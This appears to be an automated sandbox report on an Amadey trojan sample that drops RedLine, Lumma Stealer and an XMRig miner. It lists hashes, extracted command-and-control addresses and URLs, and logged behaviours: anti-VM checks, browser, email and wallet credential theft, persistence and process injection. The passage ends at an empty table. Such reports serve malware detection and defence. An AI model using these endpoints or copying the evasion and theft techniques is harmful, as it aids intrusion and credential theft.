amadey | 941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
23-06-2024 23:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
Size

1.8MB
MD5

c66ee818a2295aac69baa17df301de34
SHA1

d0a9103fa9505c6409dbf65b144cc9767fdb66b5
SHA256

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709
SHA512

96d3ffe0dfe5db3f21b19d7e7ed624e5444950d19633a236262fbd7353a4ef999c491505343ea5c7e4d7ac765831c653a52f8294ded05451ba6c330e0c464633
SSDEEP

49152:Y2603wGW756PFPcwCuE3+ZZjBOUV4eeF:Nw/756K3+cU

Score

10^/10

amadey lumma redline xmrig ama e76b71 livetraffic discovery evasion execution infostealer miner persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

4.185.27.237:13528

Extracted

Family

lumma

https://parallelmercywksoffw.shop/api

https://liabiliytshareodlkv.shop/api

https://notoriousdcellkw.shop/api

https://conferencefreckewl.shop/api

https://flourhishdiscovrw.shop/api

https://landdumpycolorwskfw.shop/api

https://barebrilliancedkoso.shop/api

https://disappointcredisotw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe	family_redline
behavioral1/memory/4660-41-0x0000000000DF0000-0x0000000000E40000-memory.dmp	family_redline
behavioral1/memory/3156-66-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/776-615-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-621-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-619-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-620-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-618-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-617-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-614-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-687-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/776-750-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

77 1384 powershell.exe
81 1384 powershell.exe
86 1124 powershell.exe
87 1124 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4952 powershell.exe
3492 powershell.exe
2452 powershell.exe
3532 powershell.exe
1384 powershell.exe
1124 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
77	1384	powershell.exe
81	1384	powershell.exe
86	1124	powershell.exe
87	1124	powershell.exe

pid	process
4952	powershell.exe
3492	powershell.exe
2452	powershell.exe
3532	powershell.exe
1384	powershell.exe
1124	powershell.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplong.exeNewLatest.exeHkbsse.exe941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	NewLatest.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	Hkbsse.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe

Executes dropped EXE 18 IoCs

Processes:

axplong.exeama.exegold.exelummac2.exeNewLatest.exeHkbsse.exeInstaller.exelegs.exe1.exeFirstZ.exetaskweaker.exeHkbsse.exeaxplong.exevadimloader.exevadimloader.exereakuqnanrkn.exeHkbsse.exeaxplong.exe

pid	process
4452	axplong.exe
4660	ama.exe
532	gold.exe
3520	lummac2.exe
336	NewLatest.exe
2264	Hkbsse.exe
3312	Installer.exe
2820	legs.exe
4376	1.exe
944	FirstZ.exe
4812	taskweaker.exe
4952	Hkbsse.exe
4636	axplong.exe
872	vadimloader.exe
4944	vadimloader.exe
5096	reakuqnanrkn.exe
4028	Hkbsse.exe
3200	axplong.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Software\Wine	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
Key opened	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Software\Wine	axplong.exe

Loads dropped DLL 38 IoCs

Processes:

vadimloader.exe

pid	process
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe
4944	vadimloader.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/776-611-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-612-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-613-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-615-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-621-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-619-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-620-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-618-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-617-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-614-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-609-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-610-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-687-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/776-750-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Installer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

158 pastebin.com
159 pastebin.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

140 api.ipify.org
141 api.ipify.org
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4388 powercfg.exe
3060 powercfg.exe
3028 powercfg.exe
1096 powercfg.exe
2128 powercfg.exe
556 powercfg.exe
2892 powercfg.exe
3012 powercfg.exe

flow	ioc
158	pastebin.com
159	pastebin.com

flow	ioc
140	api.ipify.org
141	api.ipify.org

pid	process
4388	powercfg.exe
3060	powercfg.exe
3028	powercfg.exe
1096	powercfg.exe
2128	powercfg.exe
556	powercfg.exe
2892	powercfg.exe
3012	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

FirstZ.exepowershell.exereakuqnanrkn.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeaxplong.exeaxplong.exeaxplong.exe

pid process

1856 941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
4452 axplong.exe
4636 axplong.exe
3200 axplong.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

gold.exelegs.exetaskweaker.exereakuqnanrkn.exe

description	pid	process	target process
PID 532 set thread context of 3156	532	gold.exe	RegAsm.exe
PID 2820 set thread context of 5080	2820	legs.exe	RegAsm.exe
PID 4812 set thread context of 3944	4812	taskweaker.exe	BitLockerToGo.exe
PID 5096 set thread context of 3724	5096	reakuqnanrkn.exe	conhost.exe
PID 5096 set thread context of 776	5096	reakuqnanrkn.exe	explorer.exe

Drops file in Windows directory 2 IoCs

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeNewLatest.exe

description ioc process

File created C:\Windows\Tasks\axplong.job 941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4876 sc.exe
368 sc.exe
2436 sc.exe
2340 sc.exe
4308 sc.exe
4672 sc.exe
1440 sc.exe
1124 sc.exe
3240 sc.exe
4416 sc.exe
3576 sc.exe
5064 sc.exe
3276 sc.exe
3808 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2116 2820 WerFault.exe legs.exe
4372 4376 WerFault.exe 1.exe

description	ioc	process
File created	C:\Windows\Tasks\axplong.job	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe

pid	process
4876	sc.exe
368	sc.exe
2436	sc.exe
2340	sc.exe
4308	sc.exe
4672	sc.exe
1440	sc.exe
1124	sc.exe
3240	sc.exe
4416	sc.exe
3576	sc.exe
5064	sc.exe
3276	sc.exe
3808	sc.exe

pid	pid_target	process	target process
2116	2820	WerFault.exe	legs.exe
4372	4376	WerFault.exe	1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

528 WMIC.exe

pid	process
528	WMIC.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4416 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4880 schtasks.exe
3908 schtasks.exe
4036 schtasks.exe
4044 schtasks.exe
2552 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings	powershell.exe

pid	process
4416	reg.exe

pid	process
4880	schtasks.exe
3908	schtasks.exe
4036	schtasks.exe
4044	schtasks.exe
2552	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeaxplong.exepowershell.exepowershell.exepowershell.exeRegAsm.exeama.exeaxplong.exeFirstZ.exepowershell.exepowershell.exereakuqnanrkn.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1856	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
1856	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
4452	axplong.exe
4452	axplong.exe
1384	powershell.exe
1384	powershell.exe
1384	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
5080	RegAsm.exe
5080	RegAsm.exe
4660	ama.exe
4660	ama.exe
4660	ama.exe
4660	ama.exe
4636	axplong.exe
4636	axplong.exe
944	FirstZ.exe
3492	powershell.exe
3492	powershell.exe
2452	powershell.exe
2452	powershell.exe
3492	powershell.exe
2452	powershell.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
944	FirstZ.exe
5096	reakuqnanrkn.exe
3532	powershell.exe
3532	powershell.exe
3532	powershell.exe
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
3808	powershell.exe
3808	powershell.exe
3808	powershell.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
3060	powershell.exe
3060	powershell.exe
3060	powershell.exe
5096	reakuqnanrkn.exe
5096	reakuqnanrkn.exe
4636	powershell.exe
4636	powershell.exe
5096	reakuqnanrkn.exe
4636	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeRegAsm.exepowershell.exepowershell.exeama.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	5080	RegAsm.exe
Token: SeBackupPrivilege	5080	RegAsm.exe
Token: SeSecurityPrivilege	5080	RegAsm.exe
Token: SeSecurityPrivilege	5080	RegAsm.exe
Token: SeSecurityPrivilege	5080	RegAsm.exe
Token: SeSecurityPrivilege	5080	RegAsm.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	4660	ama.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemProfilePrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeProfSingleProcessPrivilege	1376	WMIC.exe
Token: SeIncBasePriorityPrivilege	1376	WMIC.exe
Token: SeCreatePagefilePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeDebugPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeRemoteShutdownPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: 33	1376	WMIC.exe
Token: 34	1376	WMIC.exe
Token: 35	1376	WMIC.exe
Token: 36	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemProfilePrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeProfSingleProcessPrivilege	1376	WMIC.exe
Token: SeIncBasePriorityPrivilege	1376	WMIC.exe
Token: SeCreatePagefilePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeDebugPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeRemoteShutdownPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: 33	1376	WMIC.exe
Token: 34	1376	WMIC.exe
Token: 35	1376	WMIC.exe
Token: 36	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

NewLatest.exe

pid process

336 NewLatest.exe

pid	process
336	NewLatest.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exelegs.exepowershell.exeHkbsse.execmd.exe

description	pid	process	target process
